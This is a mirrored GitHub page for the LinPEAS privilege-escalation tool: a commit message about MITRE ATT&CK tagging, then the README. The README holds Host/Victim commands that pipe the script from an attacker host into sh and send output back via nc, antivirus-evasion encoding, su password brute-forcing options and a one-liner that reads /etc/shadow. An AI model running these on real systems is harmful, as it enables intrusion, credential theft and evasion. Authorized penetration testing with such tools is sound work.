mirror of
https://github.com/peass-ng/PEASS-ng.git
synced 2026-03-12 21:23:13 -07:00
115b7e60a7
* feat: MITRE ATT&CK integration for LinPEAS and WinPEAS - Add -T T1234,T5678 flag to LinPEAS to filter checks by technique - Add mitre=T1234,T5678 argument to WinPEAS for technique-based filtering - Annotate every check title with MITRE technique ID(s) displayed in grey - Add $_mitre_tag to Generated Global Variables in 0_variables_base.sh - Add check_mitre_filter() shell function with prefix-match support - Add MitreAttackIds property to ISystemCheck interface (C#) - Update MainPrint/GreatPrint in Beaprint.cs to accept optional mitreIds - Tag all 158 LinPEAS check modules with # Mitre: metadata - Tag all 16 WinPEAS check classes with MitreAttackIds property - Update linpeasModule.py to parse # Mitre: metadata field - Update linpeasBaseBuilder.py to emit check_mitre_filter wrappers - Add 3 MITRE argument parsing tests to ArgumentParsingTests.cs * test: add MITRE filter coverage for LinPEAS builder and WinPEAS LinPEAS (test_builder.py): - test_mitre_flag_present_in_getopts: -T: must appear in getopts string - test_mitre_flag_present_in_help_text: -T must appear in built help text - test_mitre_filter_function_present: check_mitre_filter() must be in built script WinPEAS (ArgumentParsingTests.cs): - PassesMitreFilter_EmptyFilter_AllChecksPass: no filter -> all checks run - PassesMitreFilter_ExactMatch_Passes: T1082 filter matches T1082 check - PassesMitreFilter_NoMatch_Fails: T1082 filter rejects T1057 check - PassesMitreFilter_PrefixMatch_Passes: T1552 filter matches T1552.001/T1552.005 - PassesMitreFilter_SubtechniqueDoesNotMatchDifferentBase_Fails: T1548 != T1552.001 * chore: ignore .github/instructions/ and untrack todos.instructions.md * fix: complete and accurate MITRE ATT&CK mappings for LinPEAS and WinPEAS gitignore: - Add .github/instructions/ to .gitignore and untrack todos.instructions.md LinPEAS — corrected mappings: - 29_Interesting_environment_variables.sh: add missing T1552.007,T1082 - 3_USBCreator.sh: T1548 → T1548.003,T1068 (polkit bypass + CVE-class exploit) - 9_Doas.sh: T1548 → T1548.003 (doas is a sudo/sudo-caching equivalent) - 10_Pkexec.sh: T1548 → T1548.003,T1548.004,T1068 per-section specificity - 2_Process_cred_in_memory.sh: T1003,T1055 → T1003.007 (Proc Filesystem, drop wrong T1055) - 11_Superusers.sh: T1087.001,T1548 → T1087.001 (discovery only, no elevation abuse) - 14/15/16 writable files: T1574 → T1574.009,T1574.010 (specific sub-techniques) WinPEAS — corrected mappings: - SystemInfo: class expanded to full technique union; WSUS T1195→T1072,T1068; KrbRelayUp T1558→T1187,T1558; Object Manager T1548→T1068; Named Pipes T1559.001→T1559; Low-priv pipes T1559.001→T1134.001,T1559 - EventsInfo: class expanded with T1078.003,T1552.001,T1059.001,T1082 - UserInfo: class expanded; Token privileges T1134→T1134.001 - ProcessInfo: Leaked Handlers T1134.003→T1134.001 (token impersonation, not make-token) - ServicesInfo: class adds T1574.011,T1068 - ApplicationsInfo: class adds T1010,T1014 - NetworkInfo: class adds T1018,T1090 - ActiveDirectoryInfo: T1484→T1484.001; class adds T1003 - WindowsCreds: class sub-techniques T1552→T1552.001,T1552.002, T1555→T1555.003,T1555.004; SSClient T1059→T1552.001 (wrong technique entirely) - FilesInfo: class expanded with T1552.002,T1552.004,T1552.006,T1564.001,T1574.001, T1059.004,T1114.001,T1218,T1649; Cloud Credentials T1552.005→T1552.001 - SoapClientInfo: T1059,T1071→T1559,T1071.001 (IPC/Web protocol, not scripting) * fix: add missing T1613 and T1562.001 to SystemInfo class-level MitreAttackIds; label AD object enumeration with T1087.002 and T1018 * fix: correct linpeas mitre filter matching logic * fix: MITRE code bugs — pass-through for untagged checks, remove dead OR in section gate - PassesMitreFilter (Checks.cs): when MitreAttackIds is null or empty and a filter is active, return true (pass-through) instead of false. Previously any future ISystemCheck added without MITRE IDs would be silently excluded by an active filter. - linpeasBaseBuilder.py: remove redundant '|| [ -z "$MITRE_FILTER" ]' from the generated section-level gate. check_mitre_filter already returns 0 immediately when MITRE_FILTER is empty, so the OR branch was unreachable and inconsistent with the check-level gate which uses the same function without the extra guard. - ArgumentParsingTests.cs: add PassesMitreFilter_NullMitreAttackIds_PassesThrough and PassesMitreFilter_EmptyMitreAttackIds_PassesThrough regression tests. * fix(mitre): 4 bugs — dead arg parser, wait logic, subprocess forks, cleanup race Checks.cs: max-regex-file-size used string.Equals which requires exact match, so 'max-regex-file-size=500000' could never match and MaxRegexFileSize was stuck at 1000000 forever. Fixed to arg.StartsWith. Checks.cs RunChecks: wait compared loop index i against _systemCheckSelectedKeysHashSet.Count, which is 0 when all checks run (so i < -1 is always false) and semantically wrong when a key subset is selected. Replaced with a pre-count of checks that pass both filters and a running counter. 0_variables_base.sh check_mitre_filter: replaced two $(echo ... | tr ...) subprocess forks per call with pure parameter-expansion while-loops. Zero process forks, POSIX-compliant, ~632 fork()s saved per full filtered run. Declares _mitre_tags_left and _mitre_filters_left in Generated Global Variables. linpeas_builder.py: os.remove of the shared temp file raised FileNotFoundError when multiple sequential builder invocations ran (the second saw the file already deleted by the first). Wrapped in try/except FileNotFoundError. Tests: Added PassesMitreFilter_SubtechniqueFilter_DoesNotMatchParentOnlyTag and MaxRegexFileSize_ArgParsed_Correctly regression tests (16 total). * ci: add manual build-artifacts workflow (winPEAS.exe + linpeas.sh) * fix(linpeas): getopts silent mode — clear error when -T given without argument Switch getopts to silent mode (leading ':') so the shell does not emit its own terse 'No arg for -T option' message. Add explicit :) case that prints ERROR: -T requires an argument (e.g. -T T1082,T1552) and then dumps the help text before exiting 1. Add *) case for unrecognised flags with the same pattern. Behaviour for all valid flags is unchanged. * chore: untrack build-artifacts workflow, add to .gitignore
LinPEAS - Linux Privilege Escalation Awesome Script
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.wiki
Check the Local Linux Privilege Escalation checklist from book.hacktricks.wiki.
Dec 2025 update: linpeas now inspects Linux kernels for CVE-2025-38352 (POSIX CPU timers race) by combining CONFIG_POSIX_CPU_TIMERS_TASK_WORK state with kernel build information, so you immediately know if publicly available PoCs might succeed.
MacPEAS
Just execute linpeas.sh in a MacOS system and the MacPEAS version will be automatically executed
Build your own linpeas!
The latest version of linpeas allows you to select the checks you would like your linpeas to have and built it only with those checks!
This allows to create smaller and faster linpeas scripts for stealth and speed purposes.
Check how to select the checks you want to build in your own linpeas following this link.
Note that by default, in the releases pages of this repository, you will find a linpeas with all the checks.
Differences between linpeas_fat.sh, linpeas.sh and linpeas_small.sh:
- linpeas_fat.sh: Contains all checks, even third party applications in base64 embedded.
- linpeas.sh: Contains all checks, but only the third party application
linux exploit suggesteris embedded. This is the defaultlinpeas.sh. - linpeas_small.sh: Contains only the most important checks making its size smaller.
Quick Start
Find the latest versions of all the scripts and binaries in the releases page.
# From public github
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
# Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
# Excute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors
# Use a linpeas binary
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
AV bypass
#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
Firmware Analysis
If you have a firmware and you want to analyze it with linpeas to search for passwords or bad configured permissions you have 2 main options.
- If you can emulate the firmware, just run linpeas inside of it:
cp /path/to/linpeas.sh /mnt/linpeas.sh
chroot /mnt #Supposing you have mounted the firmware FS in /mnt
bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
- If you cannot emulate the firmware, use the
-f </path/to/folderparam:
# Point to the folder containing the files you want to analyze
bash /path/to/linpeas.sh -f /path/to/folder
Basic Information
The goal of this script is to search for possible Privilege Escalation Paths (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).
This script doesn't have any dependency.
Recent updates
-
Dec 2025: Added detection for sudo configurations that expose restic's
--password-commandhelper, a common privilege escalation vector observed in real environments. -
Feb 2026: Added a reminder that
linpeascan be run with-oto execute targeted checks in long-running audits.
It uses /bin/sh syntax, so can run in anything supporting sh (and the binaries and parameters used).
By default, linpeas won't write anything to disk and won't try to login as any other user using su.
LinPEAS keeps expanding vendor-specific coverage; as of 29-Nov-2025 it warns when IGEL OS appliances still ship the SUID setup/date helpers that allow NetworkManager/systemd configuration hijacking (Metasploit module linux/local/igel_network_priv_esc).
By default linpeas takes around 4 mins to complete, but It could take from 5 to 10 minutes to execute all the checks using -a parameter (Recommended option for CTFs):
- From less than 1 min to 2 mins to make almost all the checks
- Almost 1 min to search for possible passwords inside all the accesible files of the system
- 20s/user bruteforce with top2000 passwords (need
-a) - Notice that this check is super noisy - 1 min to monitor the processes in order to find very frequent cron jobs (need
-a) - Notice that this check will need to write some info inside a file that will be deleted
Interesting parameters:
- -a (all checks except regex) - This will execute also the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using
suwith the top2000 passwords. - -e (extra enumeration) - This will execute enumeration checkes that are avoided by default
- -r (regex checks) - This will search for hundreds of API keys of different platforms in the Filesystem
- -s (superfast & stealth) - This will bypass some time consuming checks - Stealth mode (Nothing will be written to disk)
- -P (Password) - Pass a password that will be used with
sudo -land bruteforcing other users - -D (Debug) - Print information about the checks that haven't discovered anything and about the time each check took
- -d/-p/-i/-t (Local Network Enumeration) - Linpeas can also discover and port-scan local networks
It's recommended to use the params -a and -r if you are looking for a complete and intensive scan.
Enumerate and search Privilege Escalation vectors.
This tool enum and search possible misconfigurations (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...) inside the host and highlight possible misconfigurations with colors.
Checks:
-o Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex). Select a comma separated list.
-s Stealth & faster (don't check some time consuming checks)
-e Perform extra enumeration
-t Automatic network scan & Internet conectivity checks - This option writes to files
-r Enable Regexes (this can take from some mins to hours)
-P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
-D Debug mode
Network recon:
-t Automatic network scan & Internet conectivity checks - This option writes to files
-d <IP/NETMASK> Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
-p <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
-i <IP> [-p <PORT(s)>] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
Port forwarding:
-F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT Execute linpeas to forward a port from a local IP to a remote IP
Firmware recon:
-f </FOLDER/PATH> Execute linpeas to search passwords/file permissions misconfigs inside a folder
Misc:
-h To show this message
-w Wait execution between big blocks of checks
-L Force linpeas execution
-M Force macpeas execution
-q Do not show banner
-N Do not use colours
Hosts Discovery and Port Scanning
With LinPEAS you can also discover hosts automatically using fping, ping and/or nc, and scan ports using nc.
LinPEAS will automatically search for this binaries in $PATH and let you know if any of them is available. In that case you can use LinPEAS to hosts dicovery and/or port scanning.
Colors
LinPEAS uses colors to indicate where does each section begin. But it also uses them the identify potencial misconfigurations.
-
The
Red/Yellow
color is used for identifing configurations that lead to PE (99% sure).
-
The
-
The
Green color is used for known good configurations (based on the name not on the content!)
-
The
Blue color is used for: Users without shell & Mounted devices
-
The
Light Cyan color is used for: Users with shell
-
The
Light Magenta color is used for: Current username
One-liner Enumerator
Here you have an old linpe version script in one line, just copy and paste it;)
The color filtering is not available in the one-liner (the lists are too big)
This one-liner is deprecated (I'm not going to update it any more), but it could be useful in some cases so it will remain here.
The default file where all the data is stored is: /tmp/linPE (you can change it at the beginning of the script)
file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files information...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside \$HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to puts the password and the result appear in console)\n"$NC >> $file;sudo -l;
PEASS Style
Are you a PEASS fan? Get now our merch at PEASS Shop and show your love for our favorite peas
Collaborate
If you want to help with the TODO tasks or with anything, you can do it using github issues or you can submit a pull request.
If you find any issue, please report it using github issues.
Linpeas is being updated every time I find something that could be useful to escalate privileges.
Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.